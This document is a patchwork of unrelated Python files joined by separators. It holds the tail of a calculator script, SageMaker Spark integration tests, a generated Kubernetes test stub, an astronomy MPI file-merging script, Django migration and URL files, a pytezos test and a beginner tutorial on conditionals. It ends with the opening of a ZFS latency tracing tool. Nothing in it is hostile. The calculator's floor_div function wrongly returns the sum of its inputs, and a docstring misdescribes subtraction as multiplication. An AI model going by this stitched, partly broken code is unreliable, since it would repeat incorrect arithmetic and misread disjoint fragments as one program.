# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '-'
print()
latest_result = subtract_two(arg1, arg2) # Store latest result
print('{0:,} - {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 3: # Multiply
print(format(' MULTIPLY (x*y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '*'
print()
latest_result = multiply_two(arg1, arg2) # Store latest result
print('{0:,} * {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 4: # Division
print(format(' INTEGER DIVISION (x/y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '/'
print()
latest_result = divide(arg1, arg2) # Store latest result
print('{0} / {1} = {2}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 5: # Exponentiate
print(format(' EXPONENTION (x**y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '**'
print()
latest_result = exp_two(arg1, arg2) # Store latest result
print('{0:,} ** {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 6: # Truncation Div
print(format(' FLOOR DIVISION (x//y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '//'
print()
latest_result = floor_div(arg1, arg2) # Store latest result
print('{0:,} // {1:,} = {2:,}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 7: # Modulo div
print(format(' MODULO DIVISION (x%y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_float()
arg2 = get_float()
operator = '%'
print()
latest_result = modulo_div(arg1, arg2) # Store latest result
print('{0} % {1} = {2}'.format(arg1, arg2, latest_result)) # Display operation
print(format(' RESULT ', '|^60'))
elif op_selection == 8: # gcd
print(format(' GCD(x,y) ', '|^60'))
# Init
# global arg1, arg2, latest_result, operator
arg1 = get_integer()
arg2 = get_integer()
operator = 'gcd'
latest_result = gcd_recursive(arg1, arg2) # Store result
print('gcd({0:,}, {1:,}) = {2:,}'.format(arg1, arg2, latest_result))
print(format(' RESULT ', '|^60'))
elif op_selection == 9: # primality
print(format(' PRIME? (True/False) ', '|^60'))
# Init
# global arg1, latest_result, operator
arg1 = int(get_positive_num())
operator = 'prime'
print()
latest_result = is_prime(arg1)
print('{0:,} is prime? - {1} '.format(arg1, latest_result))
print(format(' RESULT ', '|^60'))
else: # print
try:
if operator in ['+', '-', '*', '**', '%', '//', '/']:
print('latest_operation: {0} {1} {2} = {3}'.format(arg1, operator, arg2, latest_result) )
elif operator == 'gcd':
print('latest_operation: gcd({0}, {1}) = {2}'.format(arg1, arg2, latest_result) )
elif operator == 'prime':
print('latest_operation: is_prime({0}) = {1}'.format(arg1, latest_result) )
except UnboundLocalError as no_history:
print(no_history)
except Exception as other_error:
print(other_error)
def add_two(arg1, arg2):
""" (float, float) -> float
Adds two numbers up
Returns arg1 + arg2
"""
try:
return arg1 + arg2
except TypeError:
return 'Unsupported operation: {0} + {1} '.format(type(arg1), type(arg2))
def multiply_two(arg1, arg2):
""" (float, float) -> float
multiplies two numbers (arg1 * arg2)
Returns the product
"""
try:
return arg1 * arg2
except TypeError:
return 'Unsupported operation: {0} * {1} '.format(type(arg1), type(arg2))
def subtract_two(arg1, arg2):
""" (float, float) -> float
multiplies two numbers (arg1 - arg2)
Returns the difference
"""
try:
return arg1 - arg2
except TypeError:
return 'Unsupported operation: {0} - {1} '.format(type(arg1), type(arg2))
def divide(arg1, arg2):
""" (float, float) -> float
Divides two numbers (arg1 / arg2)
Returns arg1 / arg2
"""
try:
return arg1 / arg2
except TypeError:
return 'Unsupported operation: {0} / {1} '.format(type(arg1), type(arg2))
except ZeroDivisionError as zero_error:
return 'Unsupported operation: {0} / {1} -> {2}'.format(arg1, arg2, zero_error)
except Exception as other_error:
return 'Oops... {0}'.format(other_error)
def floor_div(arg1, arg2):
""" (float, float) -> float
Performs floor division on two numbers
Returns arg1 // arg2
"""
try:
return arg1 + arg2
except TypeError:
return 'Unsupported operation: {0} // {1} '.format(type(arg1), type(arg2))
def exp_two(arg1, arg2):
""" (float, float) -> float
Exponentiates two numbers (arg1 ** arg2)
Returns the exponent
"""
try:
return arg1 ** arg2
except TypeError:
return 'Unsupported operation: {0} ** {1} '.format(type(arg1), type(arg2))
def modulo_div(arg1, arg2):
""" (float, float) -> float
Modulo division of two numbers
Returns (arg1 % arg2)
"""
try:
return arg1 % arg2
except TypeError:
return 'Unsupported operation: {0} % {1} '.format(type(arg1), type(arg2))
except ZeroDivisionError as zero_error:
return 'Unsupported operation: {0} % {1} -> {2}'.format(arg1, arg2, zero_error)
except Exception as other_error:
return 'Oops... {0}'.format(other_error)
if __name__ == '__main__':
arithmetic_ops()
|
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import random
import time
from datetime import datetime
import boto3
import pytest
from sagemaker.s3 import S3Downloader, S3Uploader
from sagemaker.spark.processing import PySparkProcessor, SparkJarProcessor
@pytest.fixture(autouse=True)
def jitter():
"Add random sleeps before tests to avoid breaching CreateProcessingJob API limits"
time.sleep(random.random() * 10)
@pytest.fixture
def configuration() -> list:
configuration = [
{
"Classification": "spark-defaults",
"Properties": {"spark.executor.memory": "2g", "spark.executor.cores": "1"},
},
{
"Classification": "hadoop-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "core-site", "Properties": {"spark.executor.memory": "2g", "spark.executor.cores": "1"},},
{"Classification": "hadoop-log4j", "Properties": {"key": "value"}},
{
"Classification": "hive-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "hive-log4j", "Properties": {"key": "value"}},
{"Classification": "hive-exec-log4j", "Properties": {"key": "value"}},
{"Classification": "hive-site", "Properties": {"key": "value"}},
{"Classification": "spark-defaults", "Properties": {"key": "value"}},
{
"Classification": "spark-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
{"Classification": "spark-log4j", "Properties": {"key": "value"}},
{"Classification": "spark-hive-site", "Properties": {"key": "value"}},
{"Classification": "spark-metrics", "Properties": {"key": "value"}},
{"Classification": "yarn-site", "Properties": {"key": "value"}},
{
"Classification": "yarn-env",
"Properties": {},
"Configurations": [
{
"Classification": "export",
"Properties": {"HADOOP_DATANODE_HEAPSIZE": "2048", "HADOOP_NAMENODE_OPTS": "-XX:GCTimeRatio=19",},
"Configurations": [],
}
],
},
]
return configuration
@pytest.mark.parametrize(
"config", [{"instance_count": 1}, {"instance_count": 2}],
)
def test_sagemaker_pyspark_multinode(
role, image_uri, configuration, sagemaker_session, region, sagemaker_client, config
):
instance_count = config["instance_count"]
print(f"Creating job with {instance_count} instance count")
"""Test that basic multinode case works on 32KB of data"""
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=instance_count,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, timestamp)
spark_event_logs_key_prefix = "spark/spark-events/{}".format(timestamp)
spark_event_logs_s3_uri = "s3://{}/{}".format(bucket, spark_event_logs_key_prefix)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
spark_event_logs_s3_uri=spark_event_logs_s3_uri,
wait=False,
)
processing_job = spark.latest_job
s3_client = boto3.client("s3", region_name=region)
file_size = 0
latest_file_size = None
updated_times_count = 0
time_out = time.time() + 900
while not processing_job_not_fail_or_complete(sagemaker_client, processing_job.job_name):
response = s3_client.list_objects(Bucket=bucket, Prefix=spark_event_logs_key_prefix)
if "Contents" in response:
# somehow when call list_objects the first file size is always 0, this for loop
# is to skip that.
for event_log_file in response["Contents"]:
if event_log_file["Size"] != 0:
print("\n##### Latest file size is " + str(event_log_file["Size"]))
latest_file_size = event_log_file["Size"]
# update the file size if it increased
if latest_file_size and latest_file_size > file_size:
print("\n##### S3 file updated.")
updated_times_count += 1
file_size = latest_file_size
if time.time() > time_out:
raise RuntimeError("Timeout")
time.sleep(20)
# verify that spark event logs are periodically written to s3
print("\n##### file_size {} updated_times_count {}".format(file_size, updated_times_count))
assert file_size != 0
# Commenting this assert because it's flaky.
# assert updated_times_count > 1
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
# TODO: similar integ test case for SSE-KMS. This would require test infrastructure bootstrapping a KMS key.
# Currently, Spark jobs can read data encrypted with SSE-KMS (assuming the execution role has permission),
# however our Hadoop version (2.8.5) does not support writing data with SSE-KMS (enabled in version 3.0.0).
def test_sagemaker_pyspark_sse_s3(role, image_uri, sagemaker_session, region, sagemaker_client):
"""Test that Spark container can read and write S3 data encrypted with SSE-S3 (default AES256 encryption)"""
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
input_data_key = f"spark/input/sales/{timestamp}/data.jsonl"
input_data_uri = f"s3://{bucket}/{input_data_key}"
output_data_uri = f"s3://{bucket}/spark/output/sales/{timestamp}"
s3_client = sagemaker_session.boto_session.client("s3", region_name=region)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
s3_client.put_object(Body=body, Bucket=bucket, Key=input_data_key, ServerSideEncryption="AES256")
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration={
"Classification": "core-site",
"Properties": {"fs.s3a.server-side-encryption-algorithm": "AES256"},
},
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def test_sagemaker_pyspark_sse_kms_s3(
role, image_uri, sagemaker_session, region, sagemaker_client, account_id, partition
):
spark = PySparkProcessor(
base_job_name="sm-spark-py",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
# This test expected AWS managed s3 kms key to be present. The key will be in
# KMS > AWS managed keys > aws/s3
kms_key_id = None
kms_client = sagemaker_session.boto_session.client("kms", region_name=region)
for alias in kms_client.list_aliases()["Aliases"]:
if "s3" in alias["AliasName"]:
kms_key_id = alias["TargetKeyId"]
if not kms_key_id:
raise ValueError("AWS managed s3 kms key(alias: aws/s3) does not exist")
bucket = sagemaker_session.default_bucket()
timestamp = datetime.now().isoformat()
input_data_key = f"spark/input/sales/{timestamp}/data.jsonl"
input_data_uri = f"s3://{bucket}/{input_data_key}"
output_data_uri_prefix = f"spark/output/sales/{timestamp}"
output_data_uri = f"s3://{bucket}/{output_data_uri_prefix}"
s3_client = sagemaker_session.boto_session.client("s3", region_name=region)
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
s3_client.put_object(
Body=body, Bucket=bucket, Key=input_data_key, ServerSideEncryption="aws:kms", SSEKMSKeyId=kms_key_id
)
spark.run(
submit_app="test/resources/code/python/hello_py_spark/hello_py_spark_app.py",
submit_py_files=["test/resources/code/python/hello_py_spark/hello_py_spark_udfs.py"],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration={
"Classification": "core-site",
"Properties": {
"fs.s3a.server-side-encryption-algorithm": "SSE-KMS",
"fs.s3a.server-side-encryption.key": f"arn:{partition}:kms:{region}:{account_id}:key/{kms_key_id}",
},
},
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
s3_objects = s3_client.list_objects(Bucket=bucket, Prefix=output_data_uri_prefix)["Contents"]
assert len(s3_objects) != 0
for s3_object in s3_objects:
object_metadata = s3_client.get_object(Bucket=bucket, Key=s3_object["Key"])
assert object_metadata["ServerSideEncryption"] == "aws:kms"
assert object_metadata["SSEKMSKeyId"] == f"arn:{partition}:kms:{region}:{account_id}:key/{kms_key_id}"
def test_sagemaker_scala_jar_multinode(role, image_uri, configuration, sagemaker_session, sagemaker_client):
"""Test SparkJarProcessor using Scala application jar with external runtime dependency jars staged by SDK"""
spark = SparkJarProcessor(
base_job_name="sm-spark-scala",
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, datetime.now().isoformat())
scala_project_dir = "test/resources/code/scala/hello-scala-spark"
spark.run(
submit_app="{}/target/scala-2.11/hello-scala-spark_2.11-1.0.jar".format(scala_project_dir),
submit_class="com.amazonaws.sagemaker.spark.test.HelloScalaSparkApp",
submit_jars=[
"{}/lib_managed/jars/org.json4s/json4s-native_2.11/json4s-native_2.11-3.6.9.jar".format(scala_project_dir)
],
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def test_sagemaker_java_jar_multinode(tag, role, image_uri, configuration, sagemaker_session, sagemaker_client):
"""Test SparkJarProcessor using Java application jar"""
spark = SparkJarProcessor(
base_job_name="sm-spark-java",
framework_version=tag,
image_uri=image_uri,
role=role,
instance_count=2,
instance_type="ml.c5.xlarge",
max_runtime_in_seconds=1200,
sagemaker_session=sagemaker_session,
)
bucket = spark.sagemaker_session.default_bucket()
with open("test/resources/data/files/data.jsonl") as data:
body = data.read()
input_data_uri = "s3://{}/spark/input/data.jsonl".format(bucket)
S3Uploader.upload_string_as_file_body(
body=body, desired_s3_uri=input_data_uri, sagemaker_session=sagemaker_session
)
output_data_uri = "s3://{}/spark/output/sales/{}".format(bucket, datetime.now().isoformat())
java_project_dir = "test/resources/code/java/hello-java-spark"
spark.run(
submit_app="{}/target/hello-java-spark-1.0-SNAPSHOT.jar".format(java_project_dir),
submit_class="com.amazonaws.sagemaker.spark.test.HelloJavaSparkApp",
arguments=["--input", input_data_uri, "--output", output_data_uri],
configuration=configuration,
)
processing_job = spark.latest_job
waiter = sagemaker_client.get_waiter("processing_job_completed_or_stopped")
waiter.wait(
ProcessingJobName=processing_job.job_name,
# poll every 15 seconds. timeout after 15 minutes.
WaiterConfig={"Delay": 15, "MaxAttempts": 60},
)
output_contents = S3Downloader.list(output_data_uri, sagemaker_session=sagemaker_session)
assert len(output_contents) != 0
def processing_job_not_fail_or_complete(sagemaker_client, job_name):
response = sagemaker_client.describe_processing_job(ProcessingJobName=job_name)
if not response or "ProcessingJobStatus" not in response:
raise ValueError("Response is none or does not have ProcessingJobStatus")
status = response["ProcessingJobStatus"]
return status == "Failed" or status == "Completed" or status == "Stopped"
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v1.20.7
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import kubernetes.client
from kubernetes.client.models.io_xk8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from import IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom # noqa: E501
from kubernetes.client.rest import ApiException
class TestIoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(unittest.TestCase):
"""IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = kubernetes.client.models.io_xk8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from.IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom() # noqa: E501
if include_optional :
return IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(
secret = kubernetes.client.models.io_x_k8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from_secret.io_x_k8s_cluster_bootstrap_v1alpha3_KubeadmConfig_spec_contentFrom_secret(
key = '0',
name = '0', )
)
else :
return IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(
secret = kubernetes.client.models.io_x_k8s_cluster_bootstrap_v1alpha3_kubeadm_config_spec_content_from_secret.io_x_k8s_cluster_bootstrap_v1alpha3_KubeadmConfig_spec_contentFrom_secret(
key = '0',
name = '0', ),
)
def testIoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom(self):
"""Test IoXK8sClusterBootstrapV1alpha3KubeadmConfigSpecContentFrom"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
from mpi4py import MPI
import os, sys, glob, time
import numpy as np
import fitsio
def merge_table_data(infiles, ext=1):
'''
Merge the tables in HDU 1 of a set of input files
'''
data = [fitsio.read(x, ext) for x in infiles]
return np.hstack(data)
def merge_files(comm, globname, ext, outfile, outextname=None):
'''
Doesn't work for large merges; pickle barfs if objects are too big
'''
size = comm.Get_size()
rank = comm.Get_rank()
if rank == 0:
infiles = glob.glob(globname)
print('Merging {} files from {}'.format(len(infiles), globname))
sys.stdout.flush()
else:
infiles = None
infiles = comm.bcast(infiles, root=0)
#- Each rank reads and combines a different set of files
if rank == 0:
print('reading', time.asctime())
data = merge_table_data(infiles[rank::size], ext=ext)
# print('Rank {} got {} rows'.format(rank, len(data)))
def tmpfile(outfile, rank):
return '{}-{}'.format(outfile, rank)
#- Merge via temporary files on disk (!) because the data tables are
#- too big to be sent via pickle (comm.gather, comm.send) but the dtype
#- is also too complex to be sent via the non-pickle methods (comm.Send)
#- Ugly hack, but pragmatically this works well
fitsio.write(tmpfile(outfile, rank), data, clobber=True)
comm.barrier()
if rank == 0:
print('stacking', time.asctime())
data_tables = list()
for i in range(size):
data_tables.append( fitsio.read(tmpfile(outfile, i), 1) )
os.remove(tmpfile(outfile, i))
data = np.hstack(data_tables)
if rank == 0:
print('writing {}'.format(outfile), time.asctime())
sys.stdout.flush()
header = fitsio.read_header(infiles[0], ext)
tmpout = outfile + '.tmp'
fitsio.write(tmpout, data, header=header, extname=outextname)
os.rename(tmpout, outfile)
comm.barrier()
#-------------------------------------------------------------------------
comm = MPI.COMM_WORLD
size = comm.Get_size()
rank = comm.Get_rank()
import optparse
parser = optparse.OptionParser(usage = "%prog [options]")
parser.add_option("-t", "--targetdir", type=str, help="input targets directory")
parser.add_option("-s", "--skydir", type=str, help="input sky directory")
parser.add_option("-o", "--outdir", type=str, help="output directory")
# parser.add_option("-v", "--verbose", action="store_true", help="some flag")
opts, args = parser.parse_args()
#- Edison defaults for debugging convenience
if opts.skydir is None:
opts.skydir = '/global/project/projectdirs/desi/users/forero/datachallenge2017/two_percent_DESI'
if opts.targetdir is None:
opts.targetdir = '/scratch2/scratchdirs/sjbailey/desi/dc17a/targets'
if opts.outdir is None:
opts.outdir = '/scratch2/scratchdirs/sjbailey/desi/dc17a/targets/testmerge'
#- Cori
# if opts.indir is None:
# opts.indir = '/global/cscratch1/sd/sjbailey/desi/dc17a/scratch/'
# if opts.outdir is None:
# opts.outdir = '/global/cscratch1/sd/sjbailey/desi/dc17a/targets/'
out_sky = opts.outdir+'/sky.fits'
out_stddark = opts.outdir+'/standards-dark.fits'
out_stdbright = opts.outdir+'/standards-bright.fits'
out_targets = opts.outdir+'/targets.fits'
out_truth = opts.outdir+'/truth.fits'
out_mtl = opts.outdir+'/mtl.fits'
#- Check which outputs still need to be done (in case we had to rerun)
#- All ranks need to know this, but just ping the disk with rank 0
if rank == 0:
todo = dict()
todo['sky'] = not os.path.exists(out_sky)
todo['targets'] = not os.path.exists(out_targets)
todo['truth'] = not os.path.exists(out_truth)
else:
todo = None
todo = comm.bcast(todo, root=0)
if todo['sky']:
merge_files(comm, opts.skydir+'/output_*/sky.fits', 1, out_sky, 'SKY')
if todo['targets']:
merge_files(comm, opts.targetdir+'/???/targets-*.fits', 1, out_targets, 'TARGETS')
if todo['truth']:
merge_files(comm, opts.targetdir+'/???/truth-*.fits', 'TRUTH', out_truth, 'TRUTH')
#- Extracts standards from targets file we just wrote
#- These are fast enough that it is ok that the other ranks are idle
#- MTL is done last; writing it is the slowest
if rank == 0:
if not os.path.exists(out_stddark) or \
not os.path.exists(out_stdbright) or \
not os.path.exists(out_mtl):
import desitarget
targets = fitsio.read(out_targets, 'TARGETS')
if not os.path.exists(out_stddark):
print('Generating '+out_stddark)
isSTD = (targets['DESI_TARGET'] & desitarget.desi_mask['STD_FSTAR']) != 0
tmpout = out_stddark + '.tmp'
fitsio.write(tmpout, targets[isSTD], extname='STD')
os.rename(tmpout, out_stddark)
if not os.path.exists(out_stdbright):
print('Generating '+out_stdbright)
isSTD = (targets['DESI_TARGET'] & desitarget.desi_mask['STD_BRIGHT']) != 0
tmpout = out_stdbright + '.tmp'
fitsio.write(tmpout, targets[isSTD], extname='STD')
os.rename(tmpout, out_stdbright)
if not os.path.exists(out_mtl):
print('Generating '+out_mtl)
import desitarget.mtl
mtl = desitarget.mtl.make_mtl(targets)
tmpout = out_mtl+'.tmp'
mtl.meta['EXTNAME'] = 'MTL'
mtl.write(tmpout, format='fits')
os.rename(tmpout, out_mtl)
MPI.Finalize()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.1 on 2017-05-17 07:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Booking',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField()),
('level', models.IntegerField()),
('room', models.IntegerField()),
('am_dept', models.CharField(max_length=258)),
('pm_dept', models.CharField(max_length=258)),
('am_surg', models.CharField(max_length=258)),
('pm_surg', models.CharField(max_length=258)),
],
),
]
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/carthagenet/KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv.json')
def test_storage_encoding_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EEy8eRbcw8Qq2nzioviwgEeKiaftqNqtv(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
|
from django.urls import path
from .views import ContactsView, HomeView
urlpatterns = [
path('', HomeView.as_view(), name='home'),
path('contacts/', ContactsView.as_view(), name='contacts')
]
|
# conditional tests
car = 'bmw' # assignment operator
car == 'bmw' # relational operator
# ingnoring a case when making a comparision
car = 'Audi'
car.lower() == 'audi' # True
# checking for inequality
topping = 'mushrooms'
topping != 'anchovies' # True
# numerical comparison
age = 18
age == 18 # true
age != 18 # false
# comparison operator
age = 19
age < 21 # True
age <= 21 # True
age > 21 # False
age >= 21 #False
# checking for multiple conditions
age_0 = 22
age_1 = 18
# usning and to check
age_0 >= 21 and age_1 >= 21 # False
age_1 = 23
age_0 >= 21 and age_1 >= 21 # True
# using or to check multiple conditions
age_0 = 22
age_1 = 18
age_0 >= 21 or age_1 >= 21 # True
age_0 = 18
age_0 >= 21 or age_1 >= 21 # False
# boolean values
# simple boolean values
game_active = True
can_edit = False
# if statements
# simple if statements
age = 19
if age >= 18:
print("You are eligible to vote!")
# if-else ladder statement
age = 12
if age < 4:
price = 0
elif age < 18:
price = 5
else:
price = 10
print("Your cose is $" + str(price) + ".")
# condition testing with list
players = ['al', 'bey', 'cyn', 'date']
if 'al' in players:
print(True)
if 'eric' in players:
print(True)
else:
print(False)
# conditional tests with lists(cont.)
banned_users = ['ann', 'chad', 'dee']
user = 'erin'
if user not in banned_users:
print("You can play!")
# checking if a list is empty
players = []
if players:
for player in players:
print("player: " + player.title())
else:
print("We have no players yet!")
age = input("How old are you ? ")
age = int(age)
if age >= 18:
print("\nYou can vote!")
else:
print("\nSorry you can't vote!")
# while loops:
current_number = 1
while current_number <= 5:
print(current_number)
current_number += 1
# letting users choose when to quit
prompt = "\nTell me something, and I'll"
prompt += "repeat it back to you."
prompt += "\nEnter 'quit' to end the program."
message = ""
while message != 'quit':
message = input(prompt)
if message != 'quit':
print(message)
# using a flag
prompt = "\nTell me something, and I'll "
prompt += "repeat it back to you. "
prompt += "\n Enter 'quit' to end the program. "
active = True
while active:
message = input(prompt)
if message == 'quit':
active = False
else:
print(message)
# breaking out of loops
"""You can use the break statement and the continue,
statement with any of Python's loops.
For example you can use break to quit a for loop that's working through a list or a dictionary.
You can use continue to skip over certain items when looping through a list or dictionary as well.
"""
# using continue in a loop
banned_users = ['eve', 'fred', 'gary', 'helen']
prompt = "\nAdd a player to your team."
prompt += "\n Enter 'quit' when you'are done."
players = []
while True:
player = input(prompt)
if player == 'quit':
break
elif player in banned_users:
print(player + " is banned!")
continue
else:
players.append(player)
print("\nYour team: ")
for player in players:
print(player)
# avoiding infite loops
#while True:
# name = input("\nWho are you? ")
# print("Nice to meet you, " + name + "!")
# removing all instances of a value from a list
pets = ['dog', 'cat', 'dog', 'fish', 'cat', 'rabbit', 'cat']
print(pets)
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# @lint-avoid-python-3-compatibility-imports
#
# zfsdist Summarize ZFS operation latency.
# For Linux, uses BCC, eBPF.
#
# USAGE: zfsdist [-h] [-T] [-m] [-p PID] [interval] [count]
#
# Copyright 2016 Netflix, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 14-Feb-2016 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
from time import sleep, strftime
import argparse
import sys
sys.path.append('./plugins/common/')
from init_db import influx_client
from const import DatabaseType
from db_modules import write2db
from datetime import datetime
from time import strftime
# arguments
examples = """examples:
./zfsdist # show operation latency as a histogram
./zfsdist -p 181 # trace PID 181 only
./zfsdist 1 10 # print 1 second summaries, 10 times
./zfsdist -m 5 # 5s summaries, milliseconds
"""
parser = argparse.ArgumentParser(
description="Summarize ZFS operation latency",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=examples)
parser.add_argument("-T", "--notimestamp", action="store_true",
help="don't include timestamp on interval output")
parser.add_argument("-m", "--milliseconds", action="store_true",
help="output in milliseconds")
parser.add_argument("-p", "--pid",
help="trace this PID only")
parser.add_argument("interval", nargs="?",
help="output interval, in seconds")
parser.add_argument("count", nargs="?", default=99999999,
help="number of outputs")
parser.add_argument("--ebpf", action="store_true",
help=argparse.SUPPRESS)
args = parser.parse_args()
pid = args.pid
countdown = int(args.count)
if args.milliseconds:
factor = 1000000
